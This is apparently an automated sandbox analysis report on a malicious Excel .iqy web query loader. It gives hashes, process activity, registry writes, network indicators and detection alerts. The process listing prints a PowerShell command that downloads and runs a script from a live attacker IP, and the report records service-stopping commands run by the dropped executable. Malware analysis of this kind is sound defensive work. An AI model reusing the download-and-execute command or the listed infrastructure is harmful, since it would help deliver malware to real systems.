File name:

PDFFILE_1147381503_13072018.iqy

Full analysis: https://app.any.run/tasks/bb2da822-89bf-418a-a0de-bb6120427847
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 13, 2018, 12:56:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

BE35ADE510EFFC99EE9CE4702F96C310

SHA1:

27CFAD9962813766322DC75C22F7D3039BE39486

SHA256:

15C074AB2C3C57E199A9A123BD41A17ECA61E5C475F161EE2CC8242D41649BF1

SSDEEP:

3:LyUyDzKr6/UXaKR7:LSDm2W7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • winmedia2.exe (PID: 2700)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2228)
    • Downloads executable files from IP

      • powershell.exe (PID: 2228)
    • Starts NET.EXE for service management

      • cmd.exe (PID: 556)
      • cmd.exe (PID: 960)
    • Executes PowerShell scripts

      • CMD.EXE (PID: 3704)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2228)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 3420)
      • cmd.exe (PID: 3584)
    • Starts CMD.EXE for commands execution

      • winmedia2.exe (PID: 2700)
      • EXCEL.EXE (PID: 764)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 764)
    • Dropped object may contain URL's

      • EXCEL.EXE (PID: 764)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 2228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.iqy | Microsoft Web query (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
15
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe cmd.exe no specs powershell.exe winmedia2.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs sc.exe no specs net.exe no specs net1.exe no specs sc.exe no specs net1.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
556"C:\Windows\System32\cmd.exe" /C net.exe stop foundationC:\Windows\System32\cmd.exewinmedia2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
716C:\Windows\system32\net1 stop ammyyC:\Windows\system32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
764"C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE" /ddeC:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\progra~1\micros~1\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
960"C:\Windows\System32\cmd.exe" /C net.exe stop ammyyC:\Windows\System32\cmd.exewinmedia2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1504net.exe stop ammyyC:\Windows\system32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\net.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoLogo -c IEX ((new-object net.webclient).downloadstring(\"http://169.239.129.17/200\"))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.10586.117 (th2_release.160212-2359)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2700"C:\Users\admin\AppData\Local\Temp\winmedia2.exe" C:\Users\admin\AppData\Local\Temp\winmedia2.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\winmedia2.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
2800sc delete foundationC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
1060
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3196sc delete ammyyC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
1060
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3364C:\Windows\system32\net1 stop foundationC:\Windows\system32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
Total events
1 213
Read events
1 141
Write events
65
Delete events
7

Modification events

(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:cm#
Value:
636D2300FC020000010000000000000000000000
(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
Operation:writeName:MTTT
Value:
FC0200001AD1B4E9A81AD40100000000
(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete valueName:cm#
Value:
636D2300FC020000010000000000000000000000
(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete keyName:
Value:
(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
Operation:delete keyName:
Value:
(PID) Process:(764) EXCEL.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:EXCELFiles
Value:
1290600487
(PID) Process:(764) EXCEL.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1290600638
(PID) Process:(764) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
1
Suspicious files
24
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
764EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR89C3.tmp.cvr
MD5:
SHA256:
764EXCEL.EXEC:\Users\admin\AppData\Local\Temp\{47784258-DA3C-4A85-BE37-8A71B8A19ABB}
MD5:
SHA256:
764EXCEL.EXEC:\Users\admin\AppData\Local\Temp\{78C6D944-B180-4C7E-BCA9-E4AF5144E381}
MD5:
SHA256:
2228powershell.exeC:\Users\admin\AppData\Local\Temp\os4tpgp5.5en.ps1
MD5:
SHA256:
2228powershell.exeC:\Users\admin\AppData\Local\Temp\zxtlvn5q.vsj.psm1
MD5:
SHA256:
764EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:
SHA256:
2228powershell.exeC:\Users\admin\AppData\Local\Temp\winmedia2.exeexecutable
MD5:
SHA256:
764EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:
SHA256:
764EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{ECE17611-4BEE-4F1B-A927-03D8EFC174DA}.FSDbinary
MD5:
SHA256:
764EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LKO8ICX\404[1]text
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
3
DNS requests
0
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
764
EXCEL.EXE
OPTIONS
169.239.129.17:80
http://169.239.129.17/
ZA
malicious
2700
winmedia2.exe
GET
169.239.129.17:80
http://169.239.129.17/lskjfbg83847fnrf989gd
ZA
malicious
764
EXCEL.EXE
GET
169.239.129.17:80
http://169.239.129.17/404
ZA
malicious
2228
powershell.exe
GET
200
169.239.129.17:80
http://169.239.129.17/200
ZA
text
335 b
malicious
2228
powershell.exe
GET
200
169.239.129.17:80
http://169.239.129.17/space1
ZA
executable
156 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
764
EXCEL.EXE
169.239.129.17:80
Zappie Host LLC
ZA
malicious
2228
powershell.exe
169.239.129.17:80
Zappie Host LLC
ZA
malicious
2700
winmedia2.exe
169.239.129.17:80
Zappie Host LLC
ZA
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
764
EXCEL.EXE
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious DOC loader of embedded OLE from external source
764
EXCEL.EXE
A Network Trojan was detected
[PT MALWARE] Trojan-Downloader.MSExcel.DdeExec.c
2228
powershell.exe
Misc activity
ET INFO Packed Executable Download
2228
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2228
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2228
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2228
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
No debug info